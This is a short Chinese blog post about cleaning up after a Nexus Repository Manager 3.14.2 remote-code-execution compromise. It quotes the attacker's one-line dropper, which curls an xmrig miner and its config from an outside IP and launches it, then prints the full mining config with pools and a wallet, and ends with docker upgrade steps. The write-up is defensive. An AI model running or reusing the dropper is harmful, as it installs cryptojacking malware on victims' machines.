• Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞


    发现被执行的程序在xmrig在 /var/tmp/目录下 ,脚本文件内容为以下:

    curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json &

    config.json内容如下:

    {
        "algo": "cryptonight",
        "api": {
            "port": 0,
            "access-token": null,
            "id": null,
            "worker-id": null,
            "ipv6": false,
            "restricted": true
        },
        "asm": true,
        "autosave": true,
        "av": 0,
        "background": true,
        "colors": true,
        "cpu-affinity": null,
        "cpu-priority": 5,
        "donate-level": 1,
        "huge-pages": true,
        "hw-aes": null,
        "log-file": null,
        "max-cpu-usage": 95,
        "pools": [
            {
                "url": "202.144.193.8:80",
                "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
                "pass": "x",
                "rig-id": null,
                "nicehash": false,
                "keepalive": true,
                "variant": -1,
                "tls": false,
                "tls-fingerprint": null
            },
            {
                "url": "185.161.70.34:3333",
                "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
                "pass": "x",
                "rig-id": null,
                "nicehash": false,
                "keepalive": true,
                "variant": -1,
                "tls": false,
                "tls-fingerprint": null
            },
            {
                "url": "202.144.193.110:3333",
                "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
                "pass": "x",
                "rig-id": null,
                "nicehash": false,
                "keepalive": true,
                "variant": -1,
                "tls": false,
                "tls-fingerprint": null
            },
            {
                "url": "205.185.122.99:3333",
                "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
                "pass": "x",
                "rig-id": null,
                "nicehash": false,
                "keepalive": true,
                "variant": -1,
                "tls": false,
                "tls-fingerprint": null
            }       
        ],
        "print-time": 60,
        "retries": 5,
        "retry-pause": 5,
        "safe": false,
        "threads": {
            "cn": [
                {
                    "low_power_mode": 1,
                    "affine_to_cpu": false,
                    "asm": true
                },
                {
                    "low_power_mode": 1,
                    "affine_to_cpu": false,
                    "asm": true
                }
            ],
            "cn-lite": [
                {
                    "low_power_mode": 1,
                    "affine_to_cpu": false,
                    "asm": true
                },
                {
                    "low_power_mode": 1,
                    "affine_to_cpu": false,
                    "asm": true
                }
            ],
            "cn-heavy": [
                {
                    "low_power_mode": 1,
                    "affine_to_cpu": false,
                    "asm": true
                },
                {
                    "low_power_mode": 1,
                    "affine_to_cpu": false,
                    "asm": true
                }
            ]
        },
        "algo-perf": {
            "cn": 2.0,
            "cn/2": 2.0,
            "cn/msr": 2.0,
            "cn-lite": 2.0,
            "cn-heavy": 2.0
        },
        "calibrate-algo": false,
        "calibrate-algo-time": 10,
        "user-agent": null,
        "syslog": false,
        "watch": false
    }

    还有一个可 执行的程序 

    xrmrig,此程序会 导致cpu爆满 

    删除容器/var/tmp/目录下的文件,或者直接删除容器(当心数据丢失)然后把程序升级  ,用docker安装的升级如下:

    docker pull docker.io/sonatype/nexus3 //会自动拉取最新版本  
    docker run -d -p 8081:8081 -p 5000:5000 --name nexus3 -v /root/nexus-data/:/nexus-data/ --restart=always sonatype/nexus3
  • 相关阅读:
    coredump文件设置及调试
    github上传本地代码库步骤
    ubuntu上SVN版本升级到1.7
    ubuntu 上samba创建共享组目录
    linux下创建只有某个用户组可用的文件夹
    usermod -a表示在原来所属组的基础上追加
    linux mount
    Ubuntu Bash and Dash
    svn co 默认密钥' GNOME keyring
    精简版ffmpeg编译脚本
  • 原文地址:https://www.cnblogs.com/linyouyi/p/10536342.html
Copyright © 2020-2023  润新知